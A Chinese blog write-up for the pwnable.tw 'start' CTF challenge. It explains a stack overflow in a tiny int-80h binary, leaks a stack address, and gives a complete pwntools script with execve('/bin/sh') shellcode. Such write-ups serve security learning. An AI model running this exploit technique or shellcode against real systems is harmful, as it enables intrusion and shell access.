linux_pwn0x02_overflow

最新推荐文章于 2024-01-13 11:27:47 发布
最新推荐文章于 2024-01-13 11:27:47 发布
阅读量339 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/black_carrot/article/details/92704999
版权

没有源程序,ida查看,发现整个程序非常精简,完全使用int 80h的系统中断实现命令。

char start()
{
  char result; // al

  result = 3;
  __asm
  {
    int     80h; //LINUX - sys_write
    int     80h; //LINUX -
  }
  return result;
}

汇编部分:

.text:08048060                 push    esp
.text:08048061                 push    offset _exit
.text:08048066                 xor     eax, eax
.text:08048068                 xor     ebx, ebx
.text:0804806A                 xor     ecx, ecx
.text:0804806C                 xor     edx, edx
.text:0804806E                 push    3A465443h
.text:08048073                 push    20656874h
.text:08048078                 push    20747261h
.text:0804807D                 push    74732073h
.text:08048082                 push    2774654Ch
.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write
.text:08048091                 xor     ebx, ebx
.text:08048093                 mov     dl, 3Ch
.text:08048095                 mov     al, 3
.text:08048097                 int     80h             ; LINUX -
.text:08048099                 add     esp, 14h
.text:0804809C                 retn

程序共使用了两次系统中断,功能分别为sys_write和sys_read
功能就是提示输入后,读入一个字符串到stack

漏洞是一个非常基础的bof漏洞
首先使用checksec对程序进行检查:

    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

可以看到程序几乎没有防护措施,那么就可以利用最舒服的shellcode攻击了,将shellcode读入到程序,并令pc指针指向栈中对应的位置,执行以getshell。

这个攻击需要考虑的核心问题是,如何确定返回的地址?
我们要返回的目标是stack,而stack的栈帧由esp和ebp保存

仔细查看程序的汇编代码,发现在程序开始执行时,就有push esp的操作,也就是说程序的栈的地址已经存放在了栈中
这里我们记这个存入的esp值为old_esp

那么我们就可以利用sys_write来leak栈的地址,从而确定我们的返回地址了。

sys_write调用,是输出以ecx为指针指向的字符串。

本程序中,直接采用了

mov ecx,esp

的方式来将目标字符串地址传递给ecx。

而且巧合的是,当我们的函数ret之后,esp指向的内存正好就是 我们之前提到的old_esp值,那么如果我们直接返回到mov ecx,esp处,此时ecx的值,就会是“指向old_esp的指针”了,那么继续运行 调用int 80h时就会输出old_esp的值了

而通过对堆栈的观察,是可以发现堆栈架构中不同部分的绝对地址虽然会变,但是不同部分之间的偏移却是固定的,那么只要我们在gdb中跑一次程序,确定以下old_esp值与我们的shellcode的地址的偏移距离,我们就可以让程序正确的返回到我们需要的shellcode上了!

综上,我们将利用这个溢出漏洞两次,第一次用于leak出old_esp的地址,第二次就是使pc返回到shellcode,从而getshell

以下使python实现:

from pwn import *
import time
#io=process('./start')
#gdb.attach(io,"b*_start+55")
io=remote("chall.pwnable.tw",10000)
io.recvuntil(':')
io.send('a'*20+p32(0x08048087))
time.sleep(3)
addr=u32(io.recv(4))+0x14
shellcode='\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'
io.sendline('a'*20+p32(addr)+shellcode)
#io.sendline(cyclic(100))
io.interactive()
insomni@
关注
专栏目录
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 2200
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 5804
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
linux系统里分区overflow,索引组织表OVERFLOW段的等同分区
weixin_39947306的博客
05-02 174
建立分区表的时候不明确指定OVERFLOW段存储信息:SQL> SELECT * FROM TAB;未选定行SQL> SELECT DEFAULT_TABLESPACE2 FROM USER_USERS;DEFAULT_TABLESPACE------------------------------YANGTKSQL> CREATE TABLE T_IND_PART2 (ID...
overflow(2)
快乐小编的专栏
10-10 2681
9、内部浮动无影响 .clearFix{overflow: hidden; zoom: 1} .clear{zoom: 1} .clear:after{content: ''; display: table;clear: both} 10、overflow 的 两栏自适应布局 设置左边浮动,右边overflow .left { float: left; width:
linux 函数栈溢出,64位Linux下的栈溢出
weixin_30175731的博客
05-03 531
今天在看《捉虫日记》,其中讲解的Linux下的栈缓冲区溢出是32位机器的,和我的64位机器有些不同之处。下面是我在64位Linux (Ubuntu14) 下的栈缓冲区溢出实验的记录。首先是有溢出漏洞的程序,这个程序来自于《捉虫日记》。#includevoid overflow(char *arg){char buf[12];strcpy(buf, arg);}int main(int argc, ...
linux系统里分区overflow,Stack Overflow 2018开发者调查报告:Linux比Windows更受欢迎
weixin_42651887的博客
05-02 110
Stack Overflow是全球最大,最值得信赖的开发者在线社区,目前发布了他们的年度开发者调查结果,该调查在2018年1月进行。超过10万名开发者参与了今年的年度开发者调查,其中包括了从编码到人工智能(AI)等一系列新话题。最终的结果是,一些技术和操作系统在过去的一年里变得比其他的更受欢迎。根据调查,JavaScript仍然是连续六年使用最多的编程语言,后端开发人员是最常见的开发人员类型,超过...
新手玩转Linux Kernel漏洞之Kernel_Stack_Buffer_Overflow
Bill
05-27 1116
新手玩转Linux Kernel漏洞之Kernel_Stack_Buffer_Overflow 序言     这是Linux内核漏洞入门的第二篇, 由于其他大佬已经将整个提权流程将的很清楚, 此处不再赘述, 本文说一些其他大佬没讲到的地方–exp的解读. 驱动代码 提醒: 关闭内核canary的保护, 将.config的CONFIG_...
Xman pwn int_overflow writeup
qq_39596232的博客
08-25 565
题目描述: 菜鸡感觉这题似乎没有办法溢出,真的么? 分析思路: 1、首先查看一下文件的详细信息,以及相关的安全机制: tucker@ubuntu:~/pwn$ file int_overflow int_overflow: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, inter...
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5324
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 667
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
Linux下溢出漏洞利用学习
08-10 2392
背景:从进入计算机领域已有近八年的时间了,自我感觉在整体轮廓上对各层次都有了一定的了解。但就安全领域来说,却是实实在在的门外汉;然而安全话题却一直引领计算机行业的发展。最近看了不少关于黑客及逆向工程方面的资料,自认有了一定的了解;尤其在学习Xfocus出版的《网络渗透技术》时,发现溢出漏洞的发现和利用原来是这么回事。下面就我所理解的和基于书上所展示的实例,说说Lin
CTF-PWN-buuctf-others_shellcode-系统int80调用的使用方法
serfend's blog
04-24 1640
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1twNiCnqBL17_WuQr1NdGBQ?pwd=g9by 提取码:g9by 答案:flag{d07d7b41-1672-4338-a72c-43e12c26c587} 总体思路 这题是一道32位系统调用的教学题 [CTF pwn]傻傻分不清的execve、int80、syscall、system及shellcode 详细步骤 查看文件信息 in
Linux Kernel Stack Overflow/Linux 内核栈溢出
最新发布
lenky0401的专栏
01-13 1919
Linux内核会分配一页(4K stack)或两页连续(8K stack)不可交换(non-swappable)内存来作为内核栈使用。可以看到,一个地方(kernel_stack_init函数)的栈占去$0x400(有几个局部变量是直接使用的寄存器,所以才没有消耗栈),而另外一个地方(just_copy_half函数)的栈占去%rax是个不定值,这就需要继续看对应的汇编来进行分析(因为数组是动态数组),这只是个示例,如果在真实内核代码中有这样的函数,那是相当危险的。,好吧,继续8K内核栈。
Linux系统调用 int 80h int 0x80
热门推荐
xiaominthere的专栏
12-12 2万+
在网上找了好一会儿才找到,自己整理一下,也方便以后查看。 参考网址: http://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8 http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html 1.系统调用 在计算机中,系统调用(英语:sy
RN 安卓设备无法使用overflow:visible
chenxyb的博客
04-25 2341
    在安卓平台默认overflow:hidden,在使用时不能超出父元素进行布局。0.41版本后官方增加了 NODES(新的布局特性),他完美的支持了Android可以使用overflow:visible,以及更高性能的生成视图层次。使用方法也特别简单首先打开 android => app => src => main => java =>‘你的文件名’,找到Ma...
攻防世界-wp-PWN-新手区-8-int_overflow
Scorpio_m7
03-10 279
题目描述: 菜鸡感觉这题似乎没有办法溢出,真的么? 题目场景 111.200.241.244:44057 题目附件: 51ed19eacdea43e3bd67217d08eb8a0e 题目思路: 整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数。unsigned short int类型占用2字节,取值范围0~65535。 解题过程: 对于一个2字节的Unsigned short int型变量,它的有效数据长度为两个字节,当它的数据长度超过
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5595
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
java笔试题带答案
weixin_43287508的博客
03-01 3246
java笔试题带答案 最近在面试java开发工程师,虽然面试的结果不重要,但是过程还是很重要的,我觉得有必要记录下来。下面是我总结的一些java笔试题,希望能帮到大家。 三维家 —、不定项选择题 1、下列描述正确的是() A:cookie存储在客户端的临吋文件中。 B:session存储在服务器的内存中。 C:cookle的secure=true时,不允许客户端脚本访问。 D:cookle的 ht...
【Pwn】SWPUCTF_2019_login
Nothing
12-09 1206
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值